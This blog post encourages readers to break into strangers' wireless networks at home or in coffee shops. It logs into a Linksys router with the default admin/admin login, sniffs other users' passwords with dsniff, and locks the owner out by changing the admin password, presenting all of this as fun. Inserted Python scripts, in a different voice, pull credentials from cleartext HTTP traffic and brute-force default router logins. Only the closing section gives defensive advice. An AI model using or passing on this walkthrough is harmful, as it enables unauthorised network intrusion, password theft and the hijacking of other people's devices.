Open source software security

Happy Hacking via Wireless

Ok, so everyone has a wireless connection now, and *nobody* knows how to secure one. So why not have some fun with this? Try it out. You've got Linux on your laptop, right? And a wireless card? Then you're good to go. If you live in an apartment building you can probably try this out at home (and if not, go to your nearest Starbucks, Cosi, or other wireless-enabled coffee shop). Turn off any wireless access points you've got at home (Apple AirPorts, Belkin wireless routers, etc.) so that whatever connection you pick up is somebody else's. Next, fire up your computer and see if you get an internet connection. If you do, you're in business. The first thing to do is figure out where you are. 'su' to root and run 'ifconfig eth0' (or whatever interface name your wireless card shows up as) to get the IP address of your card. You'll likely get something like this:

[root@localhost jkeane]# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:30:F1:0F:F3:A4
          inet addr:192.168.1.101  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8764 errors:576 dropped:576 overruns:0 frame:576
          TX packets:8343 errors:161 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:9467422 (9.0 Mb)  TX bytes:1140032 (1.0 Mb)
          Interrupt:3 Base address:0x100

Looking at this address and netmask you'll notice I'm on 192.168.1.0/24, one of the private (RFC 1918) ranges, so it was almost certainly handed out by the DHCP server on the access point. The next step is to ping around and find other hosts and the router. Home routers usually sit at the first address in the range, and I got lucky:

[root@localhost jkeane]# ping 192.168.1.1 -c 2
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=5.02 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=150 time=2.93 ms

Running a SYN scan with OS detection against it didn't give me much:

[root@localhost jkeane]# nmap -sS -O 192.168.1.1

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Warning:  No TCP ports found open on this machine, 
OS detection will be MUCH less reliable
All 1523 scanned ports on *.*.**) are: closed
Too many fingerprints match this host for me to give an accurate OS guess
Nmap run completed -- 1 IP address (1 host up) scanned in 216 seconds

So the next step was to look for a web interface. When I entered http://192.168.1.1 into Mozilla I got a login prompt asking for a username and password for a 'Linksys BEF***** Wireless Router'. All I had to do was Google for 'Linksys default password' and sure enough the Linksys site gave me all sorts of helpful information (including advice to change the default password) ;) The default password is 'admin', so I cheerfully typed 'admin' for the username and 'admin' for the password and got the management screen. The first thing I did was check the DHCP configuration to find out what IPs are being issued to clients; 192.168.1.100 to 192.168.1.150 seemed to be the default. At first it looked like 192.168.1.100 wasn't online (the ping failed), so I checked the Linksys DHCP client table (they're so helpful) and found that a MAC address was in fact registered to 192.168.1.100. Nmap returned:

[root@localhost jkeane]# nmap -sS -O 192.168.1.100

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap run completed -- 1 IP address (0 hosts up) scanned in 30 seconds

So the client probably has some sort of personal firewall that drops ping. No matter, the next step is to fire up dsniff. Dsniff picks usernames and passwords out of cleartext protocols (FTP, telnet, POP, HTTP and the like) in any traffic your card can see, and on an open wireless network that includes everyone else's traffic on the same access point. All I have to do is log its output to a file with:

[root@localhost jkeane]# dsniff >> dlog.txt

Installing dsniff is a bit tricky, but there are RPMs for dsniff and all of its dependencies. Just leave dsniff running and sooner or later you're going to log some activity ;) Webspy, which ships with dsniff, is also a lot of fun for seeing what people on the target computer are browsing.
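To see what dsniff is actually doing when it logs a login, here is an added example (not code from the post or from dsniff itself) that pulls credentials out of raw HTTP requests the way dsniff's HTTP decoder does: an Authorization header is just base64 of user:password, and a form login is a POST body with a password field. The two captured requests are constructed for the demo, and the field-name lists are assumptions; on an open wireless network the same bytes would come from a capture of other clients' traffic.

```python
"""Pick login credentials out of cleartext HTTP requests, which is what
dsniff's HTTP decoder does for traffic it sees. This is an added example,
not code from the post or from dsniff itself. The two requests below are
constructed for the demo; on an open wireless network the same bytes would
come from a capture of other clients' traffic on the shared medium."""
import base64
from urllib.parse import parse_qs

# Constructed samples: a Basic-auth login to a router admin page and a form
# login to a webmail site, exactly as they travel over unencrypted HTTP.
CAPTURED_REQUESTS = [
    b"GET /setup.cgi HTTP/1.1\r\n"
    b"Host: 192.168.1.1\r\n"
    b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    b"\r\n",
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: webmail.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 32\r\n"
    b"\r\n"
    b"username=alice&password=pa55word",
]

# Form field names commonly used for logins (an assumed list, checked in order).
USER_FIELDS = ("username", "user", "login", "email")
PASSWORD_FIELDS = ("password", "passwd", "pass", "pwd")


def _first(form, names):
    """Return the first value in the parsed form under any of the given names."""
    for name in names:
        if name in form:
            return form[name][0]
    return None


def extract_credentials(raw):
    """Return a list of credential records found in one raw HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get("host", "?")
    found = []

    # HTTP Basic auth: the "secret" is just base64(user:password).
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        found.append({"host": host, "path": path, "kind": "basic",
                      "user": user, "password": password})

    # Form logins: a POST body with a recognisable password field.
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body.decode("latin-1"))
        password = _first(form, PASSWORD_FIELDS)
        if password is not None:
            found.append({"host": host, "path": path, "kind": "form",
                          "user": _first(form, USER_FIELDS), "password": password})
    return found


def sniff_all(requests=CAPTURED_REQUESTS):
    """Run the extractor over every captured request and flatten the results."""
    return [cred for req in requests for cred in extract_credentials(req)]


if __name__ == "__main__":
    for cred in sniff_all():
        print(f"{cred['kind']:5} {cred['host']}{cred['path']}  "
              f"{cred['user']}:{cred['password']}")
```

Nothing here is cracked: both logins are recoverable by anyone who can read the frames, which on an open wireless network is anyone associated with the same access point. That is why the encryption option discussed under Analysis matters as much as the password.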

The real fun starts when you reach the password administration screen on the Linksys web interface. Changing the password locks the actual owner out of administering the device (short of a hardware reset, which most people who never changed the default password aren't going to know how to do) while letting an attacker return to the device at will.
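The default-password step above, and the advice under Analysis to change defaults, both come down to one check: does the admin page still accept a factory login? Here is an added example (not code from the post or from Linksys) that runs that check against an HTTP Basic-auth admin page. It starts a throwaway local server standing in for the router, so it runs offline; the realm text, the accepted login and the list of defaults are assumptions for the demo, not values from any real firmware. Run the client side against a real device only where you are authorised to test it.

```python
"""Try factory-default logins against an HTTP Basic-auth admin page.

Added example, not code from the post or from Linksys. It starts a throwaway
local HTTP server that stands in for a router admin page protected by Basic
authentication, tries a short list of common defaults against it, and reports
the first pair that works. The realm text, the accepted login and the
credential list are assumptions for the demo, not values from real firmware.
"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

FAKE_REALM = "Demo Wireless Router"      # assumed realm string
FAKE_VALID = ("admin", "admin")          # assumed factory login still in place

# Common factory defaults to try, in order (assumed list for the demo).
DEFAULT_CREDS = [("", "admin"), ("admin", ""), ("admin", "admin"),
                 ("admin", "password"), ("root", "root")]


def _basic_token(user, password):
    """Encode user:password the way the Authorization header carries it."""
    return base64.b64encode(f"{user}:{password}".encode()).decode()


class FakeAdminHandler(BaseHTTPRequestHandler):
    """Answers 401 with a Basic challenge unless the Authorization header matches."""

    def do_GET(self):
        if self.headers.get("Authorization") == "Basic " + _basic_token(*FAKE_VALID):
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><body>Setup</body></html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{FAKE_REALM}"')
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_fake_router():
    """Serve the stand-in on 127.0.0.1 at an ephemeral port; return (server, url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeAdminHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


# Ignore any http_proxy in the environment so probes go straight to the device.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def probe(url, user, password, timeout=3):
    """Send one authenticated GET; return (status, realm from a 401 challenge or None)."""
    req = urllib.request.Request(url)
    req.add_header("Authorization", "Basic " + _basic_token(user, password))
    try:
        with _opener.open(req, timeout=timeout) as resp:
            return resp.status, None
    except urllib.error.HTTPError as err:
        challenge = err.headers.get("WWW-Authenticate", "")
        realm = None
        if challenge.lower().startswith("basic") and 'realm="' in challenge:
            realm = challenge.split('realm="', 1)[1].split('"', 1)[0]
        return err.code, realm


def find_default_login(url, candidates=DEFAULT_CREDS):
    """Try each (user, password) in turn; return the first accepted pair, or None."""
    for user, password in candidates:
        if probe(url, user, password)[0] == 200:
            return (user, password)
    return None


if __name__ == "__main__":
    server, url = start_fake_router()
    print("challenge realm:", probe(url, "nobody", "nothing")[1])
    print("working default:", find_default_login(url))
    server.shutdown()
```

The realm string from the first 401 is the same text the browser showed in its prompt, and is what told the author which vendor's default list to look up. The probes themselves go over plain HTTP, so every attempt, including the one that works, is visible to the dsniff run from the previous section.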

Analysis

Unfortunately this sort of attack is all too easy to accomplish; fortunately it is just as easy to defend against. Everyone should change default passwords. In addition, nearly every wireless access point lets you set MAC filters. First log the MAC addresses of the computers on your LAN. MAC addresses are conveniently stamped on almost all PCMCIA (laptop) cards; you can also find yours on a Linux box with ifconfig (it's the HWaddr field in the output above) or with 'ipconfig /all' on a Windows machine. Then set up MAC filtering for your wireless network, bearing in mind that MAC addresses are sent in the clear in every frame and are trivial to spoof, so a filter keeps out casual neighbours but not anyone running a sniffer. Most access points also let you encrypt traffic in transit or set an access password; turn on the strongest encryption the device supports, because everything dsniff picked up above was readable only because the link was unencrypted. You should use ALL of the options available for your particular device.